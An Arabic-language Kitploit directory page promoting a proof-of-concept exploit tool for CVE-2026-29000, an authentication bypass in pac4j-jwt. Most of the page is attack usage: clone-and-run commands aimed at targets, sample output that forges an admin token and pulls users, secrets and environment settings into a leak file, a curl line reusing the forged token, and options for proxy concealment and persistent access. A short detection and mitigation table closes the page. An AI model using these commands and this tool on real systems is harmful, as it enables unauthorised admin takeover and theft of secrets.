Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-29000-PoC-Exploit — CVE-2026-29000 – pac4j-jwt تجاوز المصادقة (🔥 CVSS 10.0). تزوير مشرف بنقرة واحدة عبر تغليف JWE باستخدام المفتاح العام. يسرب التكوينات والمستخدمين والأسرار. البقاء على قيد الحياة، بروكسي، JWKS مخصصة.⚙️ أداة استغلال PoC تعليمية. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-29000-poc-exploit
المصادقة والترخيصتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليمالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubtc4dy/cve-2026-29000-poc-exploit

CVE-2026-29000-PoC-Exploit

CVE-2026-29000 – pac4j-jwt تجاوز المصادقة (🔥 CVSS 10.0). تزوير مشرف بنقرة واحدة عبر تغليف JWE باستخدام المفتاح العام. يسرب التكوينات والمستخدمين والأسرار. البقاء على قيد الحياة، بروكسي، JWKS مخصصة.⚙️ أداة استغلال PoC تعليمية.

عرض المستودع
31منذ 3 أشهرلم تتم المراجعة بعد

🚀 CVE-2026-29000 - استغلال تجاوز المصادقة في pac4j-jwt

Python CVSS License Pentesting

CVE-2026-29000 - تزوير المسؤول بنقرة واحدة عبر JWT alg:none + تشفير JWE

📌 نظرة عامة

يستغل هذا الأداة CVE-2026-29000، وهي ثغرة أمنية حرجة بتقييم CVSS 10.0 في مكتبة pac4j-jwt. من خلال استخراج مفتاح JWKS العام للخادم وتزوير رمز JWE مشفر باستخدام alg: none، يحقق تجاوزًا كاملاً للمصادقة ويمنح صلاحيات إدارية كاملة بنقرة واحدة.

🔥 الميزات الرئيسية

  • ✅ لا حاجة للمصادقة - استغلال قبل المصادقة، لا حاجة لبيانات اعتماد صالحة
  • ✅ اكتشاف تلقائي لـ JWKS - يمسح 15+ نقطة نهاية، دعم مسار مخصص
  • ✅ استخراج مفتاح RSA - يجلب المفتاح العام، يحول JWK→PEM فوراً
  • ✅ تزوير JWT + JWE - ينشئ JWT بـ alg:none، يغلّفه بالمفتاح العام للخادم
  • ✅ رمز مسؤول كامل - ROLE_ADMIN, admin:true, انتهاء صلاحية قابل للتكوين
  • ✅ تجاوز المصادقة - يختبر 8+ نقطة نهاية محمية تلقائياً
  • ✅ تسريب معلومات ذكي - يعدّد 20+ مسار API حساس
  • ✅ استمرار الجلسة - خيط البقاء على قيد الحياة يحافظ على الوصول
  • ✅ دعم الوكيل - وكيل HTTP/HTTPS للإخفاء
  • ✅ تصدير إلى ملف - حفظ الرمز المزور + البيانات المسربة إلى ملفات
  • ✅ آلية إعادة المحاولة - إعادة محاولة قابلة للتكوين للاتصالات غير المستقرة
  • ✅ إخراج ملون - تغذية بصرية احترافية حسب المرحلة
  • ✅ وضع مفصّل - تسجيل التصحيح لاستكشاف الأخطاء
  • ✅ لا تأخيرات ثابتة - فقط تأخير إعادة المحاولة ونبضات البقاء على قيد الحياة

🎯 الإصدارات المعرضة للخطر

المكتبةالإصدارات المتأثرةالإصدارات المصححة
pac4j-jwt< 5.1.5≥ 5.1.5
pac4j-jwt4.x < 4.5.8≥ 4.5.8
pac4j-jwt3.x < 3.18.6≥ 3.18.6

⚠️ إخلاء مسؤولية: هذه الأداة مخصصة لاختبارات الأمان المصرح بها ومشاركات الفريق الأحمر فقط.

📦 التثبيت

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-29000-PoC-Exploit.git
cd CVE-2026-29000-PoC-Exploit
pip install -r requirements.txt
python exploit.py --help

requirements.txt:

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
pyjwt>=2.8.0
cryptography>=41.0.0
jwcrypto>=1.5.0
colorama>=0.4.6

🚀 الاستخدام

استغلال أساسي لمرة واحدة

root@kitploit:~
python exploit.py --target https://victim.com:8443

حفظ الرمز المزور + بيانات التسريب

root@kitploit:~
python exploit.py -t https://target.corp:9443 -o admin.jwe -l stolen.txt

الوضع المفصل مع JWKS مخصص

root@kitploit:~
python exploit.py -t https://example.com:8080 --jwks /oauth/jwks.json -v

مع وكيل وبدون بقاء على قيد الحياة

root@kitploit:~
python exploit.py -t https://192.168.1.100:443 --proxy http://127.0.0.1:8080 --no-keep-alive

فاصل زمني مخصص للبقاء على قيد الحياة

root@kitploit:~
python exploit.py -t https://victim.com:8443 --delay 10 --max-retries 5

تمكين التحقق من SSL

root@kitploit:~
python exploit.py -t https://legit.com:8443 --ssl-verify

⚙️ وسائط سطر الأوامر

📸 مثال الإخراج

root@kitploit:~
$ python exploit.py -t https://10.10.10.100:8443 -o backdoor.jwe -l leak.txt

╔══════════════════════════════════════════════════════════════════════════════╗
║     CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit                 ║
║                    The Educational One‑Click Admin Forge                     ║
║                            CVSS 10.0 - CRITICAL                              ║
╚══════════════════════════════════════════════════════════════════════════════╝

[11:23:15] STAGE 1: Acquiring RSA public key from JWKS
[11:23:15] Probing for JWKS endpoint...
[11:23:16] Found JWKS at /realms/master/protocol/openid-connect/certs
[11:23:16] Successfully extracted RSA public key

[11:23:16] STAGE 2: Crafting JWT with alg:none & encrypting into JWE
[11:23:16] Forged JWE token (truncated): eyJhbGciOiJSU0EtT0FFUC0yNTYiLCJlbmMiOiJBMjU2R0...
[11:23:16] ✓ Token saved to backdoor.jwe

[11:23:16] STAGE 3: Sending forged JWE as Bearer token
[11:23:17] ✓ Authentication successful! Access granted to /api/users/me

[11:23:17] STAGE 4: Enumerating accessible endpoints & revealing sensitive data
[11:23:18] ✓ Leaked: /actuator/env (status 200)
[11:23:18] ✓ Leaked: /api/users (status 200)
[11:23:18] ✓ Leaked: /api/secrets (status 200)
[11:23:18] ✓ Leaked: /config/server (status 200)
[11:23:18] ✓ Captured 4 sensitive endpoints → saved to leak.txt

[11:23:18] Keep‑alive session active (Ctrl+C to stop)
[11:23:18] Token (JWE) valid for ~1 hour – reforge if expired

🧠 كيف يعمل

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  STAGE 1: Public Key Acquisition                                │
│  ├── Discover JWKS endpoint (15+ known paths)                  │
│  ├── Fetch JWK containing RSA public key                       │
│  └── Convert JWK → PEM format                                   │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 2: Token Forging                                         │
│  ├── Create JWT with alg: "none"                               │
│  ├── Inject admin claims (ROLE_ADMIN, admin: true)             │
│  └── Encrypt JWT into JWE using server's public key            │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 3: Authentication Bypass                                 │
│  ├── Send JWE as Bearer token                                   │
│  ├── Test 8+ protected endpoints                               │
│  └── Extract session cookie                                     │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 4: Information Exfiltration                              │
│  ├── Enumerate 20+ sensitive API paths                         │
│  ├── Collect configs, users, secrets, environment              │
│  └── Save all to leak file                                      │
├─────────────────────────────────────────────────────────────────┤
│  Keep-Alive: Ping /api/ping every N seconds                     │
└─────────────────────────────────────────────────────────────────┘

🔧 استخدام الرمز يدويًا

بعد الاستغلال، استخدم الرمز JWE المحفوظ مع curl:

root@kitploit:~
curl -H "Authorization: Bearer $(cat backdoor.jwe)" https://target.com/api/admin/users

🛡️ الكشف والتخفيف

طريقة الكشفالمؤشر
تحليل السجلاتJWT مع alg: none في سجلات التدقيق
مراقبة الشبكةطلبات نقطة نهاية JWKS من عناوين IP غير معروفة
التحقق من الإصدارcurl /actuator/info | grep pac4j

التخفيف:

  • تحديث pac4j-jwt إلى الإصدارات المصححة (≥5.1.5, ≥4.5.8, ≥3.18.6)
  • تعطيل دعم alg: none في مدقق JWT
  • تنفيذ تحقق صارم من JWE
  • مراقبة الهياكل غير العادية لـ JWT
تنزيل الأداة
الوسيطةالاختصارإلزاميالافتراضيالوصف
--target-tنعم-رابط الهدف (مثل https://example.com:8443)
--jwks-kلااكتشاف تلقائيمسار نقطة نهاية JWKS مخصص
--output-oلالا شيءحفظ رمز JWE المزور إلى ملف
--leak-lلاleaked_TIMESTAMP.txtحفظ البيانات المسربة إلى ملف
--verbose-vلاخطأتمكين إخراج التصحيح
--proxy-pلالا شيءوكيل HTTP/HTTPS
--user-agent-uaلاMozilla/5.0...وكيل مستخدم مخصص
--no-keep-alive-لاخطأتعطيل البقاء على قيد الحياة للجلسة
--delay-لا5.0فاصل نبض البقاء على قيد الحياة (ثوانٍ)
--max-retries-لا3الحد الأقصى لإعادة المحاولات لكل طلب فاشل
--ssl-verify-لاخطأالتحقق من شهادات SSL